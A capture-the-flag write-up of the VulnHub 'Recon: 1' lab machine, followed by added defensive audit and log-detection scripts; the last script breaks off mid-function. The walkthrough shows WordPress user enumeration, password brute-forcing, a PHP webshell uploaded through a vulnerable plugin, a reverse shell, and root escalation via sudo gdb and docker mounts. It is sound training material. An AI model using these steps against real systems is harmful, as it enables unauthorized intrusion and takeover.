Recon 1
Author: jason huawen
Target information
Name: recon: 1
Address:
https://www.vulnhub.com/entry/recon-1,438/
Identifying the target host IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f7:86:46 1 60 PCS Systemtechnik GmbH
192.168.56.220 08:00:27:23:fc:ec 1 60 PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host IP address is identified as 192.168.56.220.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-16 21:52 EDT
Nmap scan report for localhost (192.168.56.220)
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 93:0b:57:ce:cb:d5:2b:c5:e6:48:dc:ed:89:6c:51:44 (RSA)
| 256 64:26:e5:bd:85:e9:f8:29:d9:bd:ed:2f:ca:a5:f7:0a (ECDSA)
|_ 256 5e:41:4c:19:e2:3c:c4:68:13:0c:5f:6f:f8:71:e6:1b (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
|_http-title: recon – Just another WordPress site
MAC Address: 08:00:27:23:FC:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds
The NMAP scan results show that the target host has 2 open ports: 22 (ssh) and 80 (http).
Getting a shell
Visiting port 80 in a browser, the returned page content shows that the target host runs a WordPress site.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ curl http://192.168.56.220/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.220 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.220
+ Target Hostname: 192.168.56.220
+ Target Port: 80
+ Start Time: 2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ gobuster dir -u http://192.168.56.220 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,php,html,txt,js
[+] Timeout: 10s
===============================================================
2023/03/16 21:57:43 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.220/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.220/wp-content/]
/wp-login.php (Status: 200) [Size: 4815]
/license.txt (Status: 200) [Size: 19935]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.220/wp-includes/]
/readme.html (Status: 200) [Size: 7368]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.220/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.220/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322063 / 1323366 (99.90%)
===============================================================
2023/03/16 22:02:19 Finished
===============================================================
The directory scan did not turn up anything more valuable.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:02:46 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.220/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.56.220/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] recon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.220/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] reconauthor
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 16 22:02:55 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 13.911 KB
[+] Data Received: 405.11 KB
[+] Memory used: 240.016 MB
[+] Elapsed time: 00:00:08
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U recon -P /usr/share/wordlists/rockyou.txt
The password-cracking attempt failed (it ran for 16 minutes).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:22:31 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.220/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.56.220/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:06:23 <=======================================> (101765 / 101765) 100.00% Time: 00:06:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.220/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: http://192.168.56.220/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
[+] insert-or-embed-articulate-content-into-wordpress
| Location: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/
| Last Updated: 2022-11-27T22:41:00.000Z
| Readme: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| [!] The version is out of date, the latest version is 4.3000000017
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/, status: 200
|
| Version: 4.2995 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 16 22:29:30 2023
[+] Requests Done: 101943
[+] Cached Requests: 9
[+] Data Sent: 27.265 MB
[+] Data Received: 13.981 MB
[+] Memory used: 489.078 MB
[+] Elapsed time: 00:06:58
The plugin insert-or-embed-articulate-content-into-wordpress was identified; it has a known vulnerability:
https://www.exploit-db.com/exploits/46981#:~:text=%23%20Exploit%20Title%3A%20Authenticated%20code%20execution%20in%20%60insert-or-embed-articulate-content-into-wordpress%60,PHP%205.6%20%23%20CVE%20%3A%20-%20%23%23%201.
But this is an authenticated vulnerability, so a password still has to be cracked first. Next, try to crack the other user's password.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U reconauthor -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: reconauthor, Password: football7
With these credentials the plugin vulnerability should now be exploitable. Steps (from the exploit-db entry linked above):
# 1. Create a .zip archive with 2 files: index.html, index.php
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to
http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
Following the steps above:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ ls -alh
total 40K
drwxr-xr-x 2 kali kali 4.0K Mar 16 23:11 .
drwxr-xr-x 80 kali kali 4.0K Mar 16 21:51 ..
-rw-r--r-- 1 kali kali 1.6K Mar 16 22:41 dict
-rw-r--r-- 1 kali kali 12 Mar 16 22:54 index.html
-rw-r--r-- 1 root root 1.1K Mar 16 21:52 nmap_full_scan
-rwx------ 1 kali kali 5.4K Mar 16 23:11 shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ zip jason_shell.zip index.html shell.php
adding: index.html (stored 0%)
adding: shell.php (deflated 59%)
/wp-content/uploads/articulate_uploads/jason_shell/index.html
Visit:
http://192.168.56.220/wp-content/uploads/articulate_uploads/jason_shell/shell.php
The reverse shell from the target host was received successfully on Kali Linux:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.220] 45012
Linux hulk-buster 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
08:44:15 up 1:26, 0 users, load average: 0.00, 0.04, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ is
/bin/sh: 1: is: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hulk-buster:/$ cd /home
cd /home
www-data@hulk-buster:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Jan 28 2020 .
drwxr-xr-x 23 root root 4.0K Jan 28 2020 ..
drwxr-xr-x 3 hacker hacker 4.0K Jan 28 2020 hacker
drwxr-xr-x 2 offensivehack docker 4.0K Jan 28 2020 offensivehack
www-data@hulk-buster:/home$ cd hacker
cd hacker
www-data@hulk-buster:/home/hacker$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 hacker hacker 4.0K Jan 28 2020 .
drwxr-xr-x 4 root root 4.0K Jan 28 2020 ..
-rw------- 1 hacker hacker 8 Jan 28 2020 .bash_history
-rw-r--r-- 1 hacker hacker 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 hacker hacker 3.7K Jan 28 2020 .bashrc
drwx------ 2 hacker hacker 4.0K Jan 28 2020 .cache
-rw-r--r-- 1 hacker hacker 655 Jan 28 2020 .profile
www-data@hulk-buster:/home/hacker$ cd ..
cd ..
www-data@hulk-buster:/home$ cd offensivehack
cd offensivehack
www-data@hulk-buster:/home/offensivehack$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 offensivehack docker 4.0K Jan 28 2020 .
drwxr-xr-x 4 root root 4.0K Jan 28 2020 ..
-rw------- 1 offensivehack offensivehack 72 Jan 28 2020 .bash_history
-rw-r--r-- 1 offensivehack docker 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 offensivehack docker 3.7K Jan 28 2020 .bashrc
-rw-r--r-- 1 offensivehack docker 655 Jan 28 2020 .profile
-rw-r--r-- 1 root root 47 Jan 28 2020 user.txt
www-data@hulk-buster:/home/offensivehack$ cat user.txt
cat user.txt
oho!! not finished now.. find root flag.txt !!
www-data@hulk-buster:/home/offensivehack$
Privilege escalation
www-data@hulk-buster:/home/offensivehack$ sudo -l
sudo -l
Matching Defaults entries for www-data on hulk-buster:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on hulk-buster:
(offensivehack) NOPASSWD: /usr/bin/gdb
www-data@hulk-buster:/home/offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
<offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
Now running as the offensivehack user.
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest ccc6e87d482b 3 years ago 64.2MB
$ docker run -it -v /:/mnt ubuntu
docker run -it -v /:/mnt ubuntu
Since offensivehack is in the docker group, Docker can be used to escalate privileges: the container mounts the host's root filesystem at /mnt, so the host's /root is readable as root inside the container.
root@d5bd00c86145:/mnt/root# cat flag.txt
cat flag.txt
_____ _ _ _ _ _ _
/ ____| | | | | | | | | | | | |
| | __ ___ ___ __| | | | ___ | |__ | | | | | |
| | |_ |/ _ \ / _ \ / _` | _ | |/ _ \| '_ \ | | | | | |
| |__| | (_) | (_) | (_| | | |__| | (_) | |_) | |_| |_| |_|
\_____|\___/ \___/ \__,_| \____/ \___/|_.__/ (_) (_) (_)
_ _ _ _ __ _ _ _ _ _ _ _____ _______ ______
| | | \ | | | | / _| | | | (_) | | | | (_) / ____|__ __| ____|
_ __ ___ | |_ | \| | ___ ___ | |__ __ _| |_| |_ ___ _ __ ___ ___ | |_ ___ _ __ __ _ | |_| |__ _ ___ | | | | | |__
| '_ \ / _ \| __| | . ` |/ _ \ / _ \| '_ \ / _` | _| __/ _ \ '__| / __|/ _ \| \ \ / / | '_ \ / _` | | __| '_ \| / __| | | | | | __|
| | | | (_) | |_ | |\ | (_) | (_) | |_) | | (_| | | | || __/ | \__ \ (_) | |\ V /| | | | | (_| | | |_| | | | \__ \ | |____ | | | |
|_| |_|\___/ \__| |_| \_|\___/ \___/|_.__/ \__,_|_| \__\___|_| |___/\___/|_| \_/ |_|_| |_|\__, | \__|_| |_|_|___/ \_____| |_| |_|
root@d5bd00c86145:/mnt/root#
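Both escalation paths used here (a NOPASSWD sudo rule for gdb, and membership in the docker group) are things a routine host audit can catch before anyone abuses them. The following Python script is an added example, not part of the original write-up: it parses the `sudo -l` and `id` output shown above and flags sudo rules for binaries that can spawn a shell, as well as membership in root-equivalent groups. The sample inputs are copied from the write-up's transcript; the lists of shell-capable binaries and root-equivalent groups are an assumed small baseline, not a complete catalogue.

```python
"""Audit 'sudo -l' and 'id' output for local privilege-escalation paths.

Added example, not from the original write-up. The sample outputs below are
copied from the write-up's shell transcript; SHELL_CAPABLE and
ROOT_EQUIVALENT_GROUPS are an assumed baseline, not an exhaustive list.
"""
import re

# Binaries that can run arbitrary commands when executed under sudo (assumed subset).
SHELL_CAPABLE = {
    "gdb", "vim", "vi", "less", "more", "python", "python3", "perl",
    "find", "awk", "bash", "sh", "env", "docker",
}

# Groups whose membership is effectively root on most Linux hosts (assumed subset).
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk", "sudo", "wheel"}

# One sudoers rule line as printed by `sudo -l`, e.g. "(offensivehack) NOPASSWD: /usr/bin/gdb".
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

# Sample inputs copied from the write-up's transcript.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on hulk-buster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User www-data may run the following commands on hulk-buster:
    (offensivehack) NOPASSWD: /usr/bin/gdb
"""
ID_OUTPUT = "uid=1001(offensivehack) gid=119(docker) groups=119(docker)"


def parse_sudo_l(text):
    """Return a list of (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # rule lines follow this header
            continue
        if not in_rules:
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in m["cmds"].split(","):
            rules.append((m["runas"].strip(), nopasswd, cmd.strip()))
    return rules


def parse_id(text):
    """Return (user, set of group names) from `id` output."""
    user = re.search(r'uid=\d+\(([^)]+)\)', text).group(1)
    _, _, groups_part = text.partition("groups=")
    groups = set(re.findall(r'\d+\(([^)]+)\)', groups_part))
    return user, groups


def audit(sudo_text, id_text):
    """Return human-readable findings; an empty list means nothing risky was seen."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(sudo_text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL":
            reason = "any command"
        elif binary in SHELL_CAPABLE:
            reason = f"{binary} can spawn a shell"
        else:
            continue
        pw = " without a password" if nopasswd else ""
        findings.append(f"sudo: may run {cmd} as {runas}{pw} ({reason})")
    user, groups = parse_id(id_text)
    for g in sorted(groups & ROOT_EQUIVALENT_GROUPS):
        findings.append(f"group: {user} is a member of {g}, which is root-equivalent")
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT, ID_OUTPUT):
        print(finding)
```

On the transcript above the script reports two findings: the gdb rule (runnable as offensivehack without a password) and offensivehack's docker group membership. The fix on the defender's side is to remove the gdb rule or restrict it to a non-interactive wrapper, and to keep the docker group limited to accounts that are already trusted with root.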
Lessons learned
- In general, wpscan only needs to crack the administrator account's password, but on this target cracking the administrator password failed. In that case the other user should be considered, especially since the vulnerable plugin can be exploited by users of any role (any role).
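The password attack that eventually succeeded here is exactly what a defender would want to notice in the web server's access log. The following Python script is an added example, not part of the original write-up or of wpscan: it parses Apache combined-format log lines, counts POSTs to wp-login.php and xmlrpc.php per source IP inside a sliding window, and flags a burst; a 302 response from wp-login.php is taken as the sign that one guess succeeded, because WordPress re-renders the login form with status 200 on a failed login and redirects on success. The log lines, the 60-second window and the threshold of 5 attempts are constructed assumptions.

```python
"""Detect WordPress password-guessing bursts in Apache access logs.

Added example, not part of the original write-up. SAMPLE_LOG is constructed
to resemble what the wpscan password attack would leave in access.log; the
window and threshold are assumptions to tune for your own traffic.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>[^ "?]+)[^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# WordPress endpoints that accept a username/password pair.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

# Constructed sample (not a real capture): guesses from the Kali host in the
# write-up, one legitimate feed fetch and one legitimate login from another IP.
SAMPLE_LOG = """\
192.168.56.146 - - [16/Mar/2023:22:30:01 -0400] "POST /wp-login.php HTTP/1.1" 200 4815 "-" "WPScan v3.8.22"
192.168.56.146 - - [16/Mar/2023:22:30:02 -0400] "POST /wp-login.php HTTP/1.1" 200 4815 "-" "WPScan v3.8.22"
192.168.56.146 - - [16/Mar/2023:22:30:03 -0400] "POST /wp-login.php HTTP/1.1" 200 4815 "-" "WPScan v3.8.22"
192.168.56.1 - - [16/Mar/2023:22:30:04 -0400] "GET /index.php/feed/ HTTP/1.1" 200 1290 "-" "Mozilla/5.0"
192.168.56.146 - - [16/Mar/2023:22:30:04 -0400] "POST /wp-login.php HTTP/1.1" 200 4815 "-" "WPScan v3.8.22"
192.168.56.146 - - [16/Mar/2023:22:30:05 -0400] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.22"
192.168.56.146 - - [16/Mar/2023:22:30:06 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.22"
192.168.56.1 - - [16/Mar/2023:22:30:30 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per source IP whose densest burst of credential POSTs
    reaches `threshold` inside `window`."""
    attempts = defaultdict(list)
    for line in lines:
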